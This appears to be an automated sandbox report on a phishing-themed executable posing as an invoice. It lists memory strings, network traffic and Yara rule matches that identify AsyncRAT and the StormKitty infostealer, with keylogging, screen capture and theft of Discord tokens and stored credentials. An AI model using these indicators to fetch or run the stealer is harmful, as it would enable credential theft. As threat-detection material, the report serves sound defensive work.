Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/7B75u64B
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp, Invoice-BL. Payment TT $ 28,945.99.exe, 00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, SFHAWxtoIpgL.exe, 0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13
Source: tmp157F.tmp.dat.6.dr	String found in binary or memory: https://support.mozilla.org
Source: tmp157F.tmp.dat.6.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: tmp157F.tmp.dat.6.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: tmp3F96.tmp.dat.11.dr, History.txt0.11.dr, tmp147E.tmp.dat.6.dr, History.txt0.6.dr, tmp3F75.tmp.dat.11.dr, tmp146E.tmp.dat.6.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: tmp3F96.tmp.dat.11.dr, tmp147E.tmp.dat.6.dr, tmp3F75.tmp.dat.11.dr, tmp146E.tmp.dat.6.dr	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: tmp3F96.tmp.dat.11.dr, History.txt0.11.dr, tmp147E.tmp.dat.6.dr, History.txt0.6.dr, tmp3F75.tmp.dat.11.dr, tmp146E.tmp.dat.6.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: tmp3F96.tmp.dat.11.dr, tmp147E.tmp.dat.6.dr, tmp3F75.tmp.dat.11.dr, tmp146E.tmp.dat.6.dr	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: tmp148F.tmp.dat.6.dr, tmp144C.tmp.dat.6.dr, tmp3F54.tmp.dat.11.dr, tmp3FA6.tmp.dat.11.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: tmp148F.tmp.dat.6.dr, tmp144C.tmp.dat.6.dr, tmp3F54.tmp.dat.11.dr, tmp3FA6.tmp.dat.11.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: tmp157F.tmp.dat.6.dr	String found in binary or memory: https://www.mozilla.org
Source: tmp157F.tmp.dat.6.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: tmp157F.tmp.dat.6.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: History.txt.11.dr, History.txt.6.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/)
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4127382290.0000000003E69000.00000004.00000800.00020000.00000000.sdmp, tmp41B0.tmp.dat.11.dr, places.raw.6.dr, tmp157F.tmp.dat.6.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: tmp157F.tmp.dat.6.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: Invoice-BL. Payment TT $ 28,945.99.exe, 00000006.00000002.4127382290.0000000003E69000.00000004.00000800.00020000.00000000.sdmp, tmp41B0.tmp.dat.11.dr, places.raw.6.dr, tmp157F.tmp.dat.6.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747

Source: unknown	HTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.196.114:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49748 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.SFHAWxtoIpgL.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4114120570.0000000000420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 3848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 7276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7620, type: MEMORYSTR

Contains functionality to capture screen (.Net source)

Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, DesktopScreenshot.cs	.Net Code: Make
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, DesktopScreenshot.cs	.Net Code: Make
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, DesktopScreenshot.cs	.Net Code: Make
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, DesktopScreenshot.cs	.Net Code: Make

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, Keylogger.cs	.Net Code: SetHook
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, Keylogger.cs	.Net Code: KeyboardLayout
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, Keylogger.cs	.Net Code: SetHook
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, Keylogger.cs	.Net Code: KeyboardLayout
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, Keylogger.cs	.Net Code: SetHook
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, Keylogger.cs	.Net Code: KeyboardLayout
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, Keylogger.cs	.Net Code: SetHook
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, Keylogger.cs	.Net Code: KeyboardLayout

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.SFHAWxtoIpgL.exe.43f55b0.0.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 11.2.SFHAWxtoIpgL.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 11.2.SFHAWxtoIpgL.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 11.2.SFHAWxtoIpgL.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 11.2.SFHAWxtoIpgL.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 11.2.SFHAWxtoIpgL.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.4927508.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 7.2.SFHAWxtoIpgL.exe.43c9990.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.3e34108.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48b74e8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detect AsyncRAT based on specific strings Author: Sekoia.io
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Invoice-BL. Payment TT $ 28,945.99.exe.48474c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000007.00000002.1829555265.0000000004607000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 0000000B.00000002.4114120570.0000000000422000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000000.00000002.1723420263.0000000003E09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000006.00000002.4117062376.0000000002E41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: 00000007.00000002.1829555265.00000000043C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000000.00000002.1723420263.0000000004673000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 0000000B.00000002.4117251220.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 3848, type: MEMORYSTR	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 3848, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: Invoice-BL. Payment TT $ 28,945.99.exe PID: 7276, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7308, type: MEMORYSTR	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7308, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7620, type: MEMORYSTR	Matched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
Source: Process Memory Space: SFHAWxtoIpgL.exe PID: 7620, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Invoice-BL. Payment TT $ 28,945.99.exe

Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_013DD74C	0_2_013DD74C
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077D55DA	0_2_077D55DA
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077D6458	0_2_077D6458
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077DBC58	0_2_077DBC58
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077D4BA0	0_2_077D4BA0
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077DDB80	0_2_077DDB80
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077D42F0	0_2_077D42F0
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077DD280	0_2_077DD280
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077D8748	0_2_077D8748
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077D8739	0_2_077D8739
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077DBF10	0_2_077DBF10
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077DBF00	0_2_077DBF00
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077D3792	0_2_077D3792
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077DC648	0_2_077DC648
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077DC638	0_2_077DC638
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077D8540	0_2_077D8540
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077D8D31	0_2_077D8D31
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077D8530	0_2_077D8530
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077DBC48	0_2_077DBC48
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077DDB7E	0_2_077DDB7E
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077D6371	0_2_077D6371
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Code function: 0_2_077D7338	0_2_077D7338
